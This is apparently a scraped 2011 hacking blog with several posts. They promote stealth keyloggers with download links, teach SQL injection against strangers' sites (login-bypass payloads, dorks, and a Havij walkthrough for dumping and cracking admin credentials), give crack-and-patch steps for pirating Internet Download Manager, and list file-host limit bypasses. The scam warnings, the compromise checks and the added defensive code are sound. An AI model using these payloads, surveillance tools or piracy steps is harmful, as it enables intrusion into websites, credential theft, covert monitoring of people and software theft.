A keylogger might be as simple as an EXE and a DLL dropped on a machine and started at boot through a registry Run entry. Or it could be a full commercial product such as ProBot, which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP 

Tools:

Ardamax Keylogger is a keystroke recorder that captures the user's activity and saves it to an encrypted log file, viewable with its Log Viewer. The vendor pitches it for finding out what happened on your computer while you were away, keeping an automatic backup of everything you typed, monitoring your kids, or detecting unauthorised access. Logs can be e-mailed to you automatically, access to the program is password protected, and it also records the Internet addresses the user visited.



This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
  • Security - protects the program settings, Hidden Mode and the log file.
  • Application monitoring - records which application received each keystroke.
  • Time/Date tracking - pinpoints the exact time a window received a keystroke.
  • Powerful Log Viewer - view and save the log as an HTML page or plain text.
  • Small size - Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules or libraries, so it is smaller and faster.
  • Full Unicode support, so it can record keystrokes in Japanese, Chinese, Arabic and many other character sets.
  • Records every keystroke, including passwords and other text that is never displayed.
Other Features:
  • Windows 2000/2003/XP/Vista/Windows 7 support
  • Monitors multi-user machines
  • Automatic startup
  • Friendly interface
  • Easy to install
 
Download Ardamax Keylogger (1.94Mb)


Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7

The latest, improved and stealthiest version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for registered users, the vendor no longer offers a trial of the latest builds. Localized versions of Perfect Keylogger and a 64-bit version are also available after purchase. The last public version is still available, but keep in mind that it is not the latest and may be flagged by security software.

Download Perfect keylogger

What is SQL injection and how its accomplished!

A large number of websites are vulnerable to SQL injection, and that is the fault of whoever built the site. This post explains what SQL injection is and how it is carried out. Nowadays plenty of newcomers find an SQL error with an automated scanner and exploit it for fun; that is not a good act, and I have never used these skills for a bad purpose. This post is for people who do not know that their own website is vulnerable: it shows how the attack works and how to catch the vulnerability before someone else does. Through such a hole an attacker can get into your website within a minute. Yes, it's true.


What is SQL Injection?
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
In simple words: the attacker types characters into the admin login form that the application pastes straight into its SQL query, so the logic of the query changes and the attacker is accepted as admin. Authentication bypass is only one outcome; the same flaw lets an attacker read or modify the whole database, as the Havij walkthrough further down shows.

How is basic SQL injection Accomplished?
Google is a big help here thanks to dorks. So what is a dork?
Dork: a search query crafted to find websites that fit a particular attack type.
A few dorks used to find candidate sites:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
(Note: I am not giving all the dorks, because that might cross into illegality. You may just be learning, but we can't trust everyone.)

Paste one of these dorks into the Google search bar to find sites with such login pages.

After finding a target, the injection is attempted in the admin login fields. As the password, one of these strings is entered:
' or '1'='1
' or 'x'='x
(Google for more; it would be illegal for me to post them all here.)

In simple words:
Username : Admin
Password : ' or '1'='1

Hit login and, if the application concatenates the input into its query, you are in. Not every site is vulnerable; this is for learning purposes only, and HackersThirst is not responsible for any harm or damage caused.


That was just a simple tutorial to give you the basics of SQL injection. There are more advanced techniques too, which I will cover another day.


How to check that your website is vulnerable?
Having read the basics above, you should now have the concept of SQL injection. Many tools can also scan your website or server for such database errors. A visible database error after injecting a quote is the classic sign that user input reaches the query unsanitised: a strong indicator that the site is vulnerable, though not yet proof.
First Method:
Here is an online scanner:
http://webhosting.blackoutaio.com/~sqli/
For example, to scan www.website-wamiq.com, put this in the scanner bar:
inurl:php?=id+site:website-wamiq.com
 If you get:

http://www.website-wamiq.com/product.php?id='3 <== Success

then the website is vulnerable and can usually be exploited by working out the number of columns (the first step of a UNION-based injection).
(Note: catid, data and num are also common parameter names besides id. Simply replace id with the desired parameter in the scanner dork.)
The screenshot that followed (not reproduced here) showed a website scanned with the dork "data" instead of "id" and reported as vulnerable.
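To make both checks concrete, the login bypass from the "In simple words" example above and the single-quote probe from the first method, here is an added Python example that is not part of the original tutorial. It uses an in-memory SQLite database with a constructed users row and products row. The "vulnerable" functions build SQL by string concatenation, exactly the mistake the tutorial describes; the "safe" variants bind parameters. Function names, the sample credentials and the product row are invented for the demonstration (and a real site would store a salted password hash, not the plaintext used here to keep the query readable).

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample data (not from any real site)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 'S3cret!')")
    conn.execute("INSERT INTO products VALUES (3, 'Widget')")
    conn.commit()
    return conn


# --- the admin login form ------------------------------------------------

def login_vulnerable(conn, username, password):
    """Concatenates user input into the statement. With the password
    ' or '1'='1  the WHERE clause becomes
        username = 'Admin' AND password = '' or '1'='1
    which is true for every row, so the first user comes back and the
    attacker is logged in without knowing any password."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameter binding: the quote in the payload is data, never SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


# --- the product.php?id= style lookup ------------------------------------

def product_vulnerable(conn, id_param):
    """Numeric parameter pasted into the query; id='3 yields a syntax
    error, which a careless site prints straight to the visitor."""
    sql = "SELECT name FROM products WHERE id = " + id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def product_safe(conn, id_param):
    """Bound parameter: a malformed id matches nothing and raises nothing."""
    sql = "SELECT name FROM products WHERE id = ?"
    row = conn.execute(sql, (id_param,)).fetchone()
    return row[0] if row else None


def leaks_sql_error(lookup, conn, value):
    """The scanner heuristic from the tutorial: prepend a quote to the
    parameter and see whether the database complains. True means the
    page deserves a closer look; it is an indicator, not proof."""
    try:
        lookup(conn, "'" + value)
        return False
    except sqlite3.Error:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable login:", login_vulnerable(db, "Admin", payload))
    print("safe login:      ", login_safe(db, "Admin", payload))
    print("quote probe, vulnerable:", leaks_sql_error(product_vulnerable, db, "3"))
    print("quote probe, safe:      ", leaks_sql_error(product_safe, db, "3"))
```

The point of the pair is that filtering quote characters is the wrong fix: once the value travels as a bound parameter, the database never parses it as SQL, so the probe shows nothing and the bypass string is simply a wrong password.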




Second Method:
Here is an automated scanner for newbies: just click scan and relax.
Go to this link for detailed information on finding SQL vulnerabilities in a website.
A trial version of the Acunetix vulnerability scanner is here.


I hope you are now aware of SQL injection. Further information will be posted later.

Update:- Read Further Details below:-
How to Use Havij for SQL injection


- First, download Havij (click here to download).
- Install Havij and put the shortcut on the desktop. Now find a website that is vulnerable to SQL injection. You can use Google dorks for this; I have explained in many tutorials what a Google dork is. The most common dorks for SQL-injectable sites are:
inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

If you want the full list of 2000+ SQL injection dorks, subscribe by e-mail and then leave your address in the comments below in the form wamiqali [at] hackersthirst.com, to keep it safe from robots that harvest e-mail addresses.
- After finding the vulnerable website, open Havij. Let's say the vulnerable site has the URL:
"http://website.com/index.php?module=pages&id=85"
- Paste that URL into Havij's target field, like this:


- Hit "Analyze" and Havij probes whether SQL injection is possible. For security reasons I have not shown the name of the site I used for this tutorial.
- It reports the database server type and the operating system running on the server, and shows a message such as "Target Vulnerable" if the site is injectable.
- Now go to "Tables" and hit "Get Database". Once the databases are listed, check them all and hit "Get Tables". Select the admin table and hit "Get Columns"; then tick the username and password columns and hit "Get Data". See the picture below for all the buttons used:


- The password column will normally hold hashes rather than plaintext, most often MD5. MD5 is a one-way hash, not encryption, so it cannot be "decrypted"; what Havij's MD5 tool and the online services actually do is look the hash up in precomputed tables of common passwords, which only succeeds when the password is weak and unsalted. With a recovered password, use Havij's admin page finder to locate the login page (see the buttons for MD5 lookup and admin finding in the picture below), point your browser at it, and log in with the admin's username and password.


- Once logged in as admin, the attacker can do whatever he wants.
So automated tools matter a great deal, and you can use them to check your own website for the vulnerability too. Better to use your skills in the right direction: a real hacker thinks about benefits, not destruction. Thanks.

Sunday, 23 October 2011

Truth About “Facebook Hacker’s” Software and all such software which claim to hack password Totally Scam

Today's post is aimed at newbies who want to learn hacking but don't know what it actually means, so they assume there is software that will hack anything for them. That is a wrong concept: you cannot hack someone with a few clicks and have their password pop up in front of you. Below I reveal the realities behind such software.

Software May have a binded Trojan or Keylogger With it:-

Most often, in the case of Facebook, people go looking for a hacking program, and attackers exploit this weakness: they knock up a fake hacking tool in Visual Basic (I could design one too, a few buttons and text fields, build it, generate the .exe, and all of it fake) and bind a Trojan or keylogger to it, usually some RAT.

Software Itself can be a phisher:-

Many times the software itself is a phisher: it asks you to enter your own e-mail address and password first, which are sent straight to its creator, and then a "hacking" screen appears but you never get any result.
In fact there is no such software for hacking the Facebook, Yahoo, Gmail or MSN password of an arbitrary user. These companies pay researchers serious money to keep their servers secure so that no attacker can gain unauthorised access for bad purposes.

Some Facts I gathered to Assure you that such softwares are Fake:-

First Fact Over Youtube:-

I saw a YouTube video claiming you can hack any Facebook account with a program whose download link was given in the description (video below):

So I downloaded this fine piece of software for testing and scanned it with several antivirus engines. This is the result from NoVirusThanks:
File Information:
  • Report date: 2011-09-08 22:21:56 (GMT 1)
  • File name: fbhackupdate-4-3-exe
  • File size: 501760 bytes
  • MD5 Hash: 4db3a47a23620ac0fe59de38d7d142ac
  • SHA1 Hash: 766341e789fc2eff1a7630a4aebceec292597d50
  • Detection rate: 4 on 9 (44%) Status: INFECTED
Detections:
  • Avast - Win32:AutoRun-CHH [Trj]
  • AVG - clean
  • Avira AntiVir - clean
  • ClamAV - clean
  • Comodo - Heur.Suspicious
  • Emsisoft - P2P-Worm.Win32.Palevo!IK
  • F-Prot - clean
  • Ikarus - P2P-Worm.Win32.Palevo
Scan report generated by NoVirusThanks.org
So the file I downloaded was already infected. Whether the video's uploader knew this, or just wanted to post a tutorial regardless of the fact that it's a scam, I don't know.

Second Fact Over Google:-

I Googled "Facebook Account Hacker" and, as I expected, got many sites offering such things, paid or free. (Note: in both cases it is all a scam; I recommend you don't fall prey to it.) So I opened the following result:
Scam 1 Facebook Fake hacker
When I opened the link, ESET Smart Security immediately alerted like this and would not even let Google redirect me to the site:

Third Fact Phishing Attempt:-

I was browsing Facebook and Googling for new scams related to this post, and via Google I found a discussion in a Facebook group that went like this:


He was asking people to download the software and then, in step 2, log in with their own Facebook account. That alone proves it is fake: if you log in, your e-mail and password are sent to the application's creator. Whether this person was the attacker or just sharing it on, I don't know. Have a happy and safer Internet.

Saturday, 22 October 2011

Internet Download Manager 6 Build 8 | Patch + Serial

Internet Download Manager is a tool to accelerate downloads and squeeze the most out of your connection. Many people around the globe use it because it is reliable and fast, with a good interface for managing downloads. I have already posted earlier versions of IDM with a crack included so they can be used for free. Here is a newer version that improves on them, and I'll show how to use it for free. First, though, how is it better than the download managers built into your browser?

Features Of Internet Download Manager:-

  1. According to the official site, IDM increases download speed by up to 5 times; a licence costs about 24 USD.
  2. Comprehensive error recovery and resume capability restart downloads broken or interrupted by lost connections, network problems, computer shutdowns or unexpected power outages. A simple graphical interface makes IDM user friendly and easy to use.
    IDM's download logic accelerator uses intelligent dynamic file segmentation and safe multipart downloading to speed up downloads, then merges all the parts once the download finishes.
  3. In the newer version, every download window has tabs where you can control the speed of each download and limit it as you wish.
  4. It can easily download videos from YouTube and other websites that offer streaming video.
  5. It integrates with Mozilla Firefox, Chrome, Opera, Internet Explorer and many other popular browsers and picks up downloads automatically.

Download Internet Download Manager | Patch and Serial Included:-

You can download it for free here (click to download). To use the serial and patch, read the guide below.

How to Use Internet Download Manager For free i-e Patching Process:-

  • Download the package above.
  • Extract it with WinRAR and open the extracted folder.
  • Run the setup (Installer Hackers Thirst.com). When setup finishes, do not click Finish at the last step. (The idea is that IDM must not be running in the background, or the patch fails.)
  • Open the extracted package again and run the Patch (Online Checker Killer + Serial Generator), then hit Patch Server Check. It patches automatically (this stops IDM from checking online whether the licence is genuine). If it does not patch and a Browse window opens, go to the folder where IDM is installed, normally C:\Program Files\Internet Download Manager\IDMan.exe depending on where you installed it, and select IDMan.exe; patching will then complete.
  • Now open the pending setup, hit Finish and let IDM run. Open IDM, go to the Registration tab, enter a name and e-mail address and finally the serial number shown in the Patch (Online Checker Killer + Serial Generator), as in the screenshot above.
  • You are done. Never update this IDM, or the patch will stop working and you will have to reinstall.

Check If Your Computer Is Been Hacked

Many computer users go about their day without realising that a hacker has compromised their computer. Perhaps a file running on your machine lets a hacker pull your personal information at will. Either way, here are steps you can take to spy on your own system and make sure it has not been hacked.

NOTE: Before doing these steps, close all downloads, web pages and running programs such as MS Word, Photoshop and games, but stay connected to the Internet.

1. With everything closed, go to the desktop, refresh the screen and watch how many times the icons redraw (blink). If they refresh two or more times there is a chance you are infected with a keylogger, Trojan or virus. (Treat this as a weak heuristic at best; the network checks below are far more telling.)


2. This method is very simple for anyone using an ADSL router. With all downloads and Internet-using programs closed, watch the Ethernet activity light. It should not blink rapidly; rapid blinking means packets are flowing in and out of your computer.

With no active download or other Internet activity, little or nothing should be transferred. If it is, you might be hacked.

3. Go to Run, type cmd and press Enter. In the command prompt type

netstat -a

  
This lists the active network connections. LISTENING rows are ports your machine is offering to the network; ESTABLISHED rows are live sessions. Check whether any connection you cannot account for is ESTABLISHED; if so, you might be hacked. Use netstat -ano instead to add the owning process ID (PID) to each row, or netstat -anb from an administrator prompt to see the executable name, so you can tie a suspicious connection to a process rather than guessing.

4. If you notice abnormal behaviour, like your computer freezing for a couple of seconds every time you switch it on or in the middle of your work (if it happens often), there is a chance you are hacked. Keyloggers and Trojans are often configured to upload their logs to a destination IP or FTP address at regular intervals, and the machine or browser may stall while this is being sent.

5. Use tools like TCPView, which lists every TCP and UDP connection together with the process that owns it. That owner column is what catches most Trojan and malicious connections.

6. Keep your antivirus updated and install a separate firewall such as Comodo. An antivirus that is not updated regularly is as good as nothing. If you don't update it, often exchange data with other computers and download a lot of files, there is a good chance you are already compromised.
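As an added example that is not part of the original post, here is a small Python script that does what step 3 describes, but against netstat -ano output so every connection carries its owning PID. It keeps TCP rows, drops connections the machine makes to itself, and returns the remaining ESTABLISHED sessions plus the distinct PIDs you then look up with TCPView or tasklist. The netstat text embedded below is constructed for the example, not captured from a real host; the addresses, ports and PIDs in it are invented.

```python
"""Triage `netstat -ano` output (Windows format): list ESTABLISHED TCP
connections whose peer is not this machine, with the owning PID.
SAMPLE_NETSTAT is constructed for this example, not a real capture."""
import ipaddress
from dataclasses import dataclass

SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       928
  TCP    192.168.1.10:49731     93.184.216.34:443      ESTABLISHED     4412
  TCP    127.0.0.1:49732        127.0.0.1:49733        ESTABLISHED     5120
  TCP    192.168.1.10:49740     203.0.113.7:6667       ESTABLISHED     7344
  TCP    [::1]:49750            [::1]:49751            ESTABLISHED     5120
  UDP    0.0.0.0:5353           *:*                                    1204
"""


@dataclass(frozen=True)
class Conn:
    local: str
    remote_ip: str
    remote_port: int
    state: str
    pid: int


def split_host_port(addr):
    """'1.2.3.4:443' -> ('1.2.3.4', 443); '[::1]:80' -> ('::1', 80)."""
    host, _, port = addr.rpartition(":")
    return host.strip("[]"), int(port)


def parse_netstat(text):
    """Keep TCP rows only: UDP rows have no State column and no peer,
    and the header / title lines do not have five fields."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue
        _, local, foreign, state, pid = parts
        ip, port = split_host_port(foreign)
        conns.append(Conn(local, ip, port, state, int(pid)))
    return conns


def external_established(conns):
    """ESTABLISHED sessions with a non-loopback peer: the rows that
    need an explanation. LISTENING sockets and the machine talking to
    itself (127.0.0.1, ::1) are normal and skipped."""
    out = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue
        peer = ipaddress.ip_address(c.remote_ip)
        if peer.is_loopback or peer.is_unspecified:
            continue
        out.append(c)
    return out


def pids_to_check(conns):
    """Distinct PIDs to feed to `tasklist /FI "PID eq <n>"` or TCPView."""
    return sorted({c.pid for c in external_established(conns)})


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    for c in external_established(rows):
        print(f"PID {c.pid:<6} {c.local:<24} -> {c.remote_ip}:{c.remote_port}")
    print("PIDs to look up:", pids_to_check(rows))
```

On a real machine you would pipe the live output in (netstat -ano > netstat.txt, then read the file instead of SAMPLE_NETSTAT). The browser session on port 443 will usually turn out to be benign once its PID resolves to the browser; the point is that a session to an unfamiliar address on an odd port like 6667 now comes with a PID you can chase down rather than a bare IP.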

How the other tools can assist you in diagnostics:
TCPView: Look for suspicious processes. Right-click one and choose Process Properties to see what it is, or End Process to try to close it.
Download


Process Explorer: Lists all running processes and shows which process is the parent and which were spawned by it.
Download


PSTools: A set of console command-line tools that can list running processes and also kill them.
Download


FileAlyzer: Shows advanced information about a file (what a program does or is). It adds a Windows Explorer shell extension so you can right-click a file and choose Analyze File With FileAlyzer.
Download


DameWare NT: Typically used to administer another computer's registry remotely. Effective for removing rootkits.

Tuesday, 18 October 2011

8 Tricks for Unlimited Rapidshare and Megaupload Downloads: Bypass the Waiting Time

Rapidshare and Megaupload are the two major file-sharing websites on the Internet. Many users still don't know how to download unlimited files from them and bypass the waiting time.
1) Copy the code below into Notepad:

@echo off
echo ipconfig /flushdns
ipconfig /flushdns
echo ipconfig /release
ipconfig /release
echo ipconfig /renew
ipconfig /renew
and save it as "best4hack.bat".
Double-click this file before every download from Rapidshare or Megaupload. It flushes the DNS cache, releases your DHCP lease and requests a new one, so it only helps if your ISP then hands you a different public IP address; behind a NAT router it merely renews your private LAN address, and you need to reconnect the router instead (see trick 5).
That's it.
Enjoy unlimited downloads from Rapidshare and Megaupload.

2) Browser Javascript tricks
  • Go to the URL you want to download and click the "free" button.
  • You will see the timer start running.
  • Now type javascript:alert(c=2) in your browser's address bar.
  • Hit Enter.
  • Click OK in the popup box.
That’s it..
Now you can see the downloading screen appears in the browser…
It works fine, but some problems can occur with this trick. Here are the problems and their solutions.
Solutions:
1. If the timer did not stop, try other values such as c=3 in the JavaScript alert code.
 Example: javascript:alert(c=3)

If Rapidshare shows a warning message instead, just refresh the page and your file will start downloading automatically.

3) Firefox Addons
 
Here are two add-ons that bypass the waiting time:
For Megaupload: Megaupload NO TIME + AUTO DOWNLOAD
For Rapidshare: SkipScreen, an incredible Rapidshare and Megaupload download helper.


4) proxy websites & Software

You can use a proxy website to download the files.
Proxy software: download here
100+ proxy website links

5) Restart modems and clear cookies 

This is the most common way to download unlimited files. When your downloads finish, restart your modem and clear all cookies, then start downloading the next files.

6) IP-Hider software
 
You can also use IP-hider tools, which hide your IP address, to download unlimited files.
Download: IP Hider Platinum
Clear cookies after every download.

7) premium Link generator

A premium link generator produces premium download links without paying for an account.
Cool, isn't it?
Even without a premium account you can use these websites or tools to download files like a premium user.
Rapidshare: 50+ Rapidshare premium link generator sites
Megaupload: 50+ Megaupload premium link generator sites
Bonus: 32 sites for Rapidshare premium link generation




8) Rapidshare Download Manager

Rapidshare Download Manager is a handy program that downloads multiple files without any of the tricks above.
Download link 







 


